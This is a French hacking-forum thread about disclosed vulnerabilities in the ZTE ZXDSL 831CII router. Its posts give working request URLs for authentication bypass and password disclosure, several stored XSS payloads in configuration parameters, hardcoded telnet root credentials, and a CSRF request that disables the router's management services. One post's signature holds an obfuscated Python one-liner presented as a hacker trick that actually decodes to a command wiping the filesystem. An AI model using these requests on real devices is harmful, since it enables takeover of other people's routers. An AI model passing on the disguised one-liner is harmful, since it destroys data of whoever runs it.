Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 08-11-2014 15:11:11

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

ZTE : Escalade de privilèges sur ZXDSL 831CII (again!)

ZTE se porte bien,
  En chine il se place troisième acteur du marché en 2013 et 2014 avec une  progression vertigineuse sur cette année qui fait que le consortium colle aux basques de cisco
Cisco qui se déplume et qui pourrait bien se voir ravir la place de deuxième d'ici la fin de l'année.

Enterprise-router-revenue-market-in-Q1-2014.jpg


  Mais si vous croyez que l'ambition de ZTE se limite à une simple hsitoire de ventes, vous vous trompez du tout au tout...

  ZTE voit plus loin, ZTE pense et vit le futur, ZTE veut faire péter tous les records à tous prix.

  Et là, force est de constater qu'i il y a un domaine dans lequel il semble bien que le groupe est en train de prendre une avance considérable, presque irrattrapable pour ce monde occidental en décadence; c'est dans le domaine de l'escalade de privilège :   On atteint les cîmes....
 
   
  Rappelons donc que dans les derniers mois plusieurs failles furent découvertes sur plusieurs routeurs ZTE mettant en avant des brèches grossières permettant de prendre simplement le contrôle du router en tant qu’administrateur

  -  Escalade de privilèges sur ZTE WXV10 W300
  -  ZTE ZXHN H298N - ISP jazztel : faille WPS + backdoor
  -  Prise de contrôle à distance via telnet/SNMP des router ZTE-ZXV1O W300


  voici donc grâce Paulos Yibelo plusieurs façons ( pathétiques?) de "bypasser" l’authentification

http://192.168.1.1/main.cgi

vous avez bien vu, il vous suffit d'aller directement à la page principale du début pour ne pas avoir à mettre les utilisateurs et pass lol lol

PoC: http://192.168.1.1/adminpasswd.cgi (will result admin password change page) - viewing the source will show the current password (unencrypted)

Et vous pouvez modifier arbitrairement le mot de passe et voir celui qui est en cours d'utilisation vu qu'il est gardé en clair roll

Ce sont en fait toutes les fonctions critiques pour l'administration qui sont ainsi configurables avec de simples requêtes http

http://192.168.1.1/userpasswd.cgi
http://192.168.1.1/upload.cgi
http://192.168.1.1/conprocess.cgi
http://192.168.1.1/connect.cgi

Les détails sont publiés su cette page : ZTE ZXDSL 831CII Insecure Direct Object Reference

  Et ce n'est pas tout : le routeur est aussi vulnérables aux attaques sur les éléments dynamiques.

 TR-069 Client page: Stored. executes when users go to http://192.168.1.1/tr69cfg.html

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=43200&tr69cAcsURL=http://acs.etc.et:9090/web/tr069%27;alert%280%29;//&tr69cAcsUser=cpe&tr69cAcsPwd=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itms&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=43200&tr69cAcsURL=http://acs.site.et:9090/web/tr069&tr69cAcsUser=cpe%27;alert%280%29;//&tr69cAcsPwd=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itms&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=43200&tr69cAcsURL=http://acs.site.et:9090/web/tr069&tr69cAcsUser=cpe&tr69cAcsPwd=cpe%27;alert%280%29;//&tr69cConnReqUser=itms&tr69cConnReqPwd=itms&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=43200&tr69cAcsURL=http://acs.site.et:9090/web/tr069&tr69cAcsUser=cpe&tr69cAcsPwd=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itms%27;alert%280%29;//&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0%27;alert%280%29;//


Time and date page (/sntpcfg.sntp) - Persistent

http://192.168.1.1/sntpcfg.sntp?ntp_enabled=0&tmYear=2000%27lol&tmMonth=01&tmDay=01&tmHour=00&tmMinute=30&timezone_offset=+08:00&timezone=Beijing,%20Chongqing,%20Hong%20Kong,%20Urumqi%22;alert%280%29;//&use_dst=0&enblLightSaving=0


Quick Stats page:

192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&hostname=ZXDSL83C1II';alert(0);//&domainname=home&enblUpnp=1&enblLan2=0

http://192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&hostname=ZXDSL83C1II&domainname=home%27;alert%280%29;//&enblUpnp=1&enblLan2=0  

voir : ZTE ZXDSL 831 Cross Site Scripting


last but not least, d'autres failles sont révélées par  paulos, des trucs aussi sympat que le telnet ouvert avec accès root big_smile

Unrestricted privileges - anyone who is connected to the modem with Telnet or tftp is root. simply telneting and authenticating as admin:admin and typing sh and echo $USER would prove that.

  C'est pas piqué des hannetons!
Jetez un coup d'oeil : ZTE 831CII Hardcoded Credential / XSS / CSRF  ZTE 831CII Hardcoded Credential / XSS / CSRF


  Sur ce je vous laisse après notre moment détente "rions un peu avec ZTE"
  Bon week-end ! wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 08-11-2014 15:21:24

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 355

Re : ZTE : Escalade de privilèges sur ZXDSL 831CII (again!)

Sur le coup, Cisco aura du mal à les devancer, c'est clair lol

Hors Ligne

#3 09-11-2014 10:28:03

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : ZTE : Escalade de privilèges sur ZXDSL 831CII (again!)

⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠿⠿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿
⢿⣿⣿⣿⣿⣿⣿⡇⢸⣿⣿⣿⣿⣿⣿⠇⠀⠸⣿⣿⣿⣿⣿⡿⠀⣴⣶⣿⣿⣿⣿⣶⣶⣶⣶⡆⠀⠀⠀⠀⣿⣿⣿⢀⣤⡶⠿⠿⢿⣷⣦⡄
⠀⠀⠹⣿⣿⣇⠀⠀⠀⠀⠘⣿⣿⣇⠀⠀⠀⠀⠀⢸⣿⠏⠀⠀⠀⠀⠀⠀⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⠋⠀⠀⠀⠀⢹⣿⣿⡄
⠀⠀⠀⢻⣿⣿⡄⠀⠀⠀⢠⣿⣿⣿⡄⠀⠀⠀⠀⣾⡏⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⠃⠀⠀⠀⠀⠀⢸⣿⣿⡇
⠀⠀⠀⠀⢿⣿⣷⠀⠀⠀⣾⡏⢻⣿⣷⠀⠀⠀⣸⡿⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇
⠀⠀⠀⠀⠘⣿⣿⣧⠀⣸⡿⠀⠈⣿⣿⣧⠀⢰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⠀⠀⠀⠀⣤⠀⠀⠀⠀⣿⣿⣿⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇
⠀⠀⠀⠀⠀⢹⣿⣿⣦⣿⠃⠀⠀⠸⣿⣿⣆⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⠀⠀⠀⠀⣿⠀⠀⠀⠀⣿⣿⣿⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⡏⠀⠀⠀⠀⢹⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⡀⠀⠀⢰⣿⠀⠀⠀⠀⣿⣿⣿⡀⠀⠀⠀⠀⠀⢸⣿⣿⣇
⠀⠀⠀⠀⠀⠀⠘⣿⡟⠀⠀⠀⠀⠀⠀⢿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣦⣴⡿⠃⠀⠰⠾⠿⠿⠿⠿⠿⠿⠇⠀⠶⠿⠿⠿⠿⠿⠿⠿

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#4 09-11-2014 17:57:17

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : ZTE : Escalade de privilèges sur ZXDSL 831CII (again!)

....Et vu la nature des failles révélées; je n'ose imaginer la foultitude de failles et bugs exploitables qui doivent miner ce point d'accès.

Hors Ligne

#5 12-11-2014 12:52:44

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : ZTE : Escalade de privilèges sur ZXDSL 831CII (again!)

Je me demande si ce n'est pas une volonté délibérée de laisser une faille aussi flagrante, même le plus stupide des développeurs penserait à ça...

Hors Ligne

#6 12-11-2014 13:04:58

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : ZTE : Escalade de privilèges sur ZXDSL 831CII (again!)

Salut fuji smile
 
  Quelque part ce serait.... "rassurant": Je préfère m'imaginer que se sont de grosses backdoors plutôt que m'imaginer des êtres humains doués de raison puissent commettre de telles erreurs.

Hors Ligne

#7 12-11-2014 13:41:58

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : ZTE : Escalade de privilèges sur ZXDSL 831CII (again!)

update : et si en plus un intrus veut voulez annihiler le LAN, histoire de prendre le contrôle sans être ennuyé par un admin connecté par câble ethernet, obliger à un reset, préparer de quoi plomber l'admin au moment ou il se reconnecte.... il suffit de commencer les opération par un petit 

192.168.1.1/accesslocal.cmd?&enblicmp=0&enblftp=0&ftpport=21&enblhttp=0&httpport=80&enblsnmp=1&snmpport=161&enbltelnet=0&telnetport=23&enbltftp=1&tftpport=69&enblssh=1&sshport=22

ZXDSL 831CII Cross Site Request Forgery

C'est encore un full disclosure signé  Paulos Yibelo
Ce garçon est en forme et à mon avis on peut s'attendre à d'autres moments détente "rions un peu avec ZTE!" tongue

Hors Ligne

#8 12-11-2014 13:49:42

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : ZTE : Escalade de privilèges sur ZXDSL 831CII (again!)

Salut smile

C'est vrai, il y a aujourd'hui des outils très compliqués pour découvrir des failles avec les compétences qui vont avec, mais parfois une faille simple à découvrir et grave peut être cachée, par exemple la faille shellshock, elle a demeuré longtemps et dés sa publication elle a été exploitée a fond sur Internet, serveur Apache...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]